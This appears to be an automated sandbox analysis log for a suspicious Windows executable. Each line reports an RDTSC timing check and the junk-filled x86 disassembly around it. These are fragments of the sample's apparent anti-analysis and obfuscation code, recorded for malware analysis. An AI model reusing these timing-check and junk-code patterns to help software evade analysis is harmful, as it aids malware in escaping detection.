Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 389859 second address: 38987C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F3A9502B5EBh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007F3A9502B5EDh 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 389959 second address: 38995F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38995F second address: 389965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38A8D7 second address: 38A8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38A8DE second address: 38A943 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3A9502B5F1h 0x0000000e nop 0x0000000f jns 00007F3A9502B5E8h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov dword ptr [ebp+122D2928h], esi 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 mov bx, C353h 0x0000002d mov eax, dword ptr [ebp+122D1491h] 0x00000033 push FFFFFFFFh 0x00000035 jmp 00007F3A9502B5F7h 0x0000003a nop 0x0000003b push eax 0x0000003c push edx 0x0000003d push esi 0x0000003e jng 00007F3A9502B5E6h 0x00000044 pop esi 0x00000045 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38A943 second address: 38A95A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD4083h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38C7C0 second address: 38C7CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5EAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38F7A7 second address: 38F7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38F7B2 second address: 38F7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38F7B6 second address: 38F832 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d jl 00007F3A94CD4078h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 nop 0x00000017 mov bx, si 0x0000001a push 00000000h 0x0000001c mov edi, dword ptr [ebp+122D194Ah] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007F3A94CD4078h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e stc 0x0000003f xchg eax, esi 0x00000040 jmp 00007F3A94CD4086h 0x00000045 push eax 0x00000046 pushad 0x00000047 jmp 00007F3A94CD4086h 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38F832 second address: 38F836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 390961 second address: 390967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 390967 second address: 39096C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 39096C second address: 3909DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F3A94CD4078h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, esi 0x00000027 sbb di, E6FAh 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F3A94CD4078h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000016h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 movzx ebx, bx 0x0000004b push 00000000h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F3A94CD4082h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3909DB second address: 3909E1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3918A5 second address: 3918AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F3A94CD4076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38FAD6 second address: 38FAE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3A9502B5E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38FAE0 second address: 38FAE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 38FAE4 second address: 38FAF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jo 00007F3A9502B5ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 39292E second address: 392932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 392A92 second address: 392B3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 sub dword ptr [ebp+122D363Ah], ebx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e jo 00007F3A9502B5EBh 0x00000024 mov edi, 5866FBD4h 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F3A9502B5E8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a mov ebx, dword ptr [ebp+122D3645h] 0x00000050 mov eax, dword ptr [ebp+122D094Dh] 0x00000056 or edi, dword ptr [ebp+124822A2h] 0x0000005c mov edi, dword ptr [ebp+122D2D2Ah] 0x00000062 push FFFFFFFFh 0x00000064 jnc 00007F3A9502B5F1h 0x0000006a nop 0x0000006b jmp 00007F3A9502B5F3h 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 392B3B second address: 392B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 392B3F second address: 392B45 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 39498F second address: 394993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 394993 second address: 394999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 394999 second address: 39499E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 39C0FE second address: 39C106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 39C106 second address: 39C10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 39B9A1 second address: 39B9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A9502B5F1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 39B9B6 second address: 39B9D6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3A94CD4076h 0x00000008 jmp 00007F3A94CD4082h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 39BB08 second address: 39BB13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 39BB13 second address: 39BB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A20EC second address: 3A2113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 jo 00007F3A9502B5FBh 0x0000000e jmp 00007F3A9502B5F5h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A2113 second address: 3A212C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3A94CD407Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A212C second address: 3A2136 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A2136 second address: 3A2148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A2148 second address: 3A2157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A2157 second address: 3A215B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A238F second address: 3A2394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A2394 second address: 3A2399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A7764 second address: 3A7783 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A9502B5F2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A6B03 second address: 3A6B08 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A6B08 second address: 3A6B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007F3A9502B5E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A6F0D second address: 3A6F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A6F13 second address: 3A6F1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F3A9502B5E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A6F1F second address: 3A6F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A75D2 second address: 3A75D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A75D6 second address: 3A75DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A75DE second address: 3A75F4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F3A9502B5ECh 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A75F4 second address: 3A75FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3A75FA second address: 3A75FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 336309 second address: 33630D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 33630D second address: 336329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 336329 second address: 33632F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 33632F second address: 33634C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B073D second address: 3B0751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B0751 second address: 3B0755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B0755 second address: 3B0761 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3A94CD4076h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B0FE3 second address: 3B0FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B115B second address: 3B1169 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B143B second address: 3B1441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 360F8A second address: 360F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 360F8E second address: 360FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3A9502B5F4h 0x0000000f jmp 00007F3A9502B5F9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3399A1 second address: 3399A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B66D9 second address: 3B66F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F3h 0x00000009 jg 00007F3A9502B5E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B66F6 second address: 3B66FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B685D second address: 3B6869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3A9502B5E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B6869 second address: 3B686E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B686E second address: 3B6883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F3A9502B5E6h 0x0000000a jmp 00007F3A9502B5EBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B6883 second address: 3B68A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 ja 00007F3A94CD4076h 0x0000000d jmp 00007F3A94CD407Ch 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B68A4 second address: 3B68AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B68AD second address: 3B68B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B6BC9 second address: 3B6BDF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F3A9502B5E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F3A9502B5E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B6BDF second address: 3B6BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B7019 second address: 3B701D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B701D second address: 3B7023 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B7023 second address: 3B7029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B7029 second address: 3B703F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD4082h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B719B second address: 3B719F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B72FB second address: 3B7303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B7303 second address: 3B7309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3B7309 second address: 3B730D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 33CFA5 second address: 33CFCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F3A9502B5F7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 33CFCB second address: 33CFEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4086h 0x00000007 jmp 00007F3A94CD407Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3BF90C second address: 3BF930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3A9502B5E6h 0x0000000a pop edx 0x0000000b jmp 00007F3A9502B5F4h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3BF930 second address: 3BF936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3BF936 second address: 3BF980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A9502B5F0h 0x00000009 popad 0x0000000a jp 00007F3A9502B5F2h 0x00000010 push ecx 0x00000011 jmp 00007F3A9502B5EEh 0x00000016 jmp 00007F3A9502B5EEh 0x0000001b pop ecx 0x0000001c pushad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37827E second address: 3604AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 stc 0x0000000a call dword ptr [ebp+122D2272h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 37832B second address: 378331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
